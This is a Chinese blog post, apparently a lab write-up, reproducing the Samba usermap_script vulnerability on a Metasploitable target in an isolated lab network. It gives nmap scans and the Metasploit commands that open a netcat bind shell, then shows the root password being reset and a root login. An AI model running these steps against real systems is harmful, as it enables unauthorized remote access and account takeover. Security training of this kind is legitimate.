基于BT5R3-Metasploit完成Linux Metasploit靶机中的Samba服务漏洞复现

已于 2023-01-24 09:36:29 修改
阅读量722 收藏 2
点赞数 1
分类专栏: 《Metasploit渗透测试魔鬼训练营 文章标签: linux 服务器 网络 安全
于 2023-01-20 17:31:24 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/F14735971227/article/details/128742652
版权

实验环境:(参考Metasploit渗透测试魔鬼训练营(第一章samba漏洞复现)2.2的环境搭建)

攻击机 BT5R3-GNOME(ip 10.10.10.128)

后台服务器(ip 10.10.10.130)

靶机 Metasploit_ubuntu(ip 10.10.10.254)

一.主机发现

arp-scan -l      #扫描同一网段下的主机

3feb4013149e5d5d2e653725fcbb77c7.png

faad252a7b5f49b40f64427173759a32.png

bcdfad1bf6ca5396350163d7ec70fe6a.png

二.漏洞扫描

nmap 扫描

nmap  10.10.10.128  -p- -sV -sS -T4 -A                命令混合扫描
-p-代表全端口扫描 
-sV端口所运行的软件和版本探测 
-sS SYN半开放式扫描 
-T4 探测等级4 
-A 包含了1-10000的端口ping扫描,操作系统扫描,脚本扫描,路由跟踪,服务探测

samba端口通常为445

后台服务器上运行Oracle数据库、FTP文件共享及邮件等服务 所以需要开启后台服务器(10.10.10.130)

补充知识

Samba是在Linux和UNIX系统上实现SMB协议的一个免费软件,由服务器及客户端程序构成。SMB(Server Messages Block,信息服务块)是一种在局域网上共享文件和打印机的一种通信协议,它为局域网内的不同计算机之间提供文件及打印机等资源的共享服务。SMB协议是客户机/服务器型协议,客户机通过该协议可以访问服务器上的共享文件系统、打印机及其他资源。

这里在msfconsole调用nmap

​​​​​​​nmap -p 445 -sV 10.10.10.254

bb449658b176106bba06154ab949b2e0.png

99ead53d3b69573d25ced1a38146141f.png

在端口显示被filtered的情况下,要想确定一个端口是否是开放的,通常可结合-sT和-sS、-sF等联合判断,如上图445端口在sT扫描的情况下,显示被过滤,在sF的扫描中显示open|filtered,则表明端口是开发的。所以此时445端口开放

三.漏洞利用

msfconsole进入控制台

search samba      寻找相应的模块
use exploit/multi/samba/usermap_script
                  选择此渗透攻击模块
                  选择模块时选择excllent进行渗透成功率高
show payloads     查看与该渗透攻击模块相兼容的攻击载荷
set cmd/unix/bint_netcat
                  即利用netcat工具在渗透攻击成功后执行shell
	                并通过netcat绑定在一个监听端口上
show options      查看需要设置的参数
set RHOST 10.10.10.254 
                  RHOST受害机IP,LHOST攻击机IP
exploit           启动

 

0ffceaf831d6da86df5d2d6c597aa769.png

 

c91ff80a632f9e74128c87e8bfae8ceb.png

MSF终端回显commmand shell session 1 opened的成功信息

这时可以输入一些shell命令

利用uname-a whoami

查看你所控制的目标主机的操作系统类型以及你所拥有的用户账户类型

以下利用passwd root重设root密码

c3364ec66dbf7f9670089e9b7ecdbf59.png

四.远程连接靶机

root

123456

0515e131987cafff1f8e6d31a4cbac89.png

af6a85937633764d1b082685306f07bf.png

82df6615db52e6c54329546ac9e0ca34.png

成功!

Sky信安
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 3
    评论
专栏目录
bracktrack5r3安装+bt5r3下安装vmwaretools
知其所以然
08-23 6485
今天着手安装BT5R3。显示自己捣鼓了好久,始终安装失败呢。唉..... 我在谷歌上找到了正确安装BT5R3的方案: 传送门: http://www.linuxidc.com/Linux/2012-12/76515.htm 上面将很详细的哦。 ------小结------ 原来自己走到成功门口,倒下了,原来就是启动下面的这个应用: 右键选择“open” 命令进行安装!
2.8 利用samba漏洞进行渗透
qq_55202378的博客
07-17 2385
samba漏洞
Metasploit学习笔记(三)——Samba 3.x服务漏洞复现
Zichel77的博客
10-07 710
享文件和打印机的通信协议,它在局域网内使用Linux和Windows系统的机器之间提供文件及打印机等资源的共享服务。尝试别的exploit或者payload也不太行,但这里主要是把过程过一遍,和永恒之蓝的利用步骤完全一样。因为目标是Linux机器,一定要选择Linux的攻击载荷,而且不是每个都有用的,可以一个个尝试一下。此步就是收集主机的信息,得知445端口开放,就可以利用基于该端口的相关漏洞。然后选择Rank为excellent并且时间较新的加以利用,以提高渗透成功率。本次利用选择的是13号。
Linux通用系统高危漏洞(CVE-2024-1086)修复案例
最新发布
企业实战系列集 ●●● https://ximenjianxue.blog.csdn.net
06-26 1509
2024年3月28日,监 Linux kernel权限提升漏洞(CVE-2024-1086)的PoC/EXP在互联网上公开,该漏洞的CVSS评分为7.8,目前漏洞细节已经公开披露,美国网络安全与基础设施安全局(CISA)6月1日也更新了其已知漏洞(KEV)目录,要求联邦机构在 2024 年 6 月 20 日之前打上补丁,修复追踪编号为 CVE-2024-1086 的 Linux 内核权限提升漏洞。由于该漏洞的公开性,攻击者可能会利用这个漏洞进行恶意攻击,因此建议尽快采取修复措施。
Metasploit渗透测试魔鬼训练营》之环境搭建
Miguel自学空间
12-13 1166
熟练掌握渗透测试的实验环境搭建内容,可以让我们更好的理解后续的渗透测试操作的目的与原理。本文记录了书描述的实验环境的搭建过程的关键细节,包括环境拓扑资源下载硬件配置网络配置等,方便后续查阅。通过以上步骤完成对所有主机的配置后,可以通过ping命令测试这些主机相互之间的网络是否连通,从而验证配置是否正确。另外,也能通过ping命令测试这些主机与真实外网的连通性。通过配置实验环境,我们能更加熟悉整个网络拓扑结构,在进行渗透测试的时候,就能更清楚自己在进行的工作所针对的是哪个目标。
Samba远程Shell命令注入执行漏洞
weixin_69925635的博客
07-20 205
Samba远程Shell命令注入执行漏洞复现
Linux Samba远程代码执行漏洞(CVE-2017-7494)漏洞复现
旺仔Sec&blog
05-29 2233
1.该漏洞CVE-2017-7494又被称为Linux版的永恒之蓝 2.主要是利用smb上的反弹shell漏洞,进行远程代码执行 3.samba3.5.0 到4.6.4/4.5.10/4.4.14的间版本、docker
BT5R3-GNOME-32
09-15
这是我直接从外国官网上下载的BT5R3的 文件,下完是iso文件,若要下载BT5R3-GNOME-32-VM(解压完就可用的),见我另一个上传的资源
BT5R3-KDE-32
08-23
官方的BT5种子文件,全英文,无毒的!
BT5R2-KDE-64.torrent
05-21
BT5R2-KDE-64.torrent
BT5R3安装及汉化-附件资源
03-05
BT5R3安装及汉化-附件资源
BT5R2-GNOME-64迅雷种子
05-21
BT5R2-GNOME-64迅雷种子
BT5(R3)-GNOME-64保姆级安装一体化!(最新)
m0_62363483的博客
10-16 1144
免费分享bt5镜像,汉化.
《MS17-010(永恒之蓝)—漏洞复现及防范》
热门推荐
weixin_47118413的博客
04-10 1万+
通过Kali使用msfconsole在Win7复现MS17-010(永恒之蓝)漏洞以及如何防范。
Win10-永恒之黑漏洞复现
网安小白的博客
09-19 2840
win10永恒之黑漏洞复现,图文详解
Back Track5学习笔记
weixin_34414650的博客
05-30 400
1.BT5默认用户名:root.密码:toor(公司是yeslabccies) 2.进入图形化界面命令:startx 3.更改密码:sudo passwd root 扫描工具 第一部分网络配置: 4.网络配置文件有两个: /etc/network/interfaces和/etc/resolv.conf 前一个存放网卡接口、IP、子网掩码等,后一个主要是存放DNS。 5.查看IP...
SMB信息泄露的利用
Scalzdp的专栏
11-17 879
SMB的协议出现较早,应用较广泛,但是早期计算机协议注重应用的快速建立,而对安全的要求并不太严格,所以很多较老的设备使用了存在漏洞的SMB协议,就会存在安全隐患。我们在SMB漏洞的利用,主要还是基于msf提供的一些payload,这些payload其实都是别人做好了的,所以用起来特别方便,也从另一个方面反映如果有人要攻击利用SMB漏洞其实也很方便,所以我们在计算机安全防护上还需进行更多的考虑,必要的安全设置应该保留,不要为了一时方便,关闭所有安全防护的护盾。
Linux内核提权漏洞(Dirty-pipe)复现_linux提权漏洞
qq_53058639的博客
11-08 153
CVE-2022-0847 是存在于 Linux内核 5.8 及之后版本的本地提权漏洞。攻击者通过利用此漏洞,可覆盖重写任意可读文件的数据,从而可将普通权限的用户提升到特权 root。CVE-2022-0847 的漏洞原理类似于 CVE-2016-5195 脏牛漏洞(Dirty Cow),但它更容易被利用。漏洞作者将此漏洞命名为“Dirty Pipe”。
靶机练习2之利用Linux版本内核漏洞实现本地权限提升
yuan_boss的博客
06-20 239
可以看到,该内容存在本地权限提升的漏洞,那么我们就需要将该漏洞下载下来利用,我们可以先通过。下载之后,可以看到靶机当前目录下一句有这个漏洞文件了,为了方便文件管理,这里先把文件拷贝到。竟然扫描到了这个靶机,那么接下来进行全面扫描,收集更全面的信息,并且将信息输出到。目录下,由于这个漏洞文件是C语言编写的,所以如果想要执行这个C文件,需要使用。​ 通过以上的信息收集,并没有找到什么有用的信息,仅仅有一张图片的名字。开放了80端口,直接访问该主机,发现只有一个图片,名字为。,记住这个图片名字,或许有用。
Backtrack5r3文指南V10:全面教程与ARM支持
本资源是一份详细的Backtrack5r3文指南V10,由作者何伊圣编写,供非商业场合使用。指南主要针对BackTrack5,一个广泛应用于网络安全渗透测试Linux发行版。以下是主要内容概要: 1. **版权与使用声明**:文档...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Sky信安

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值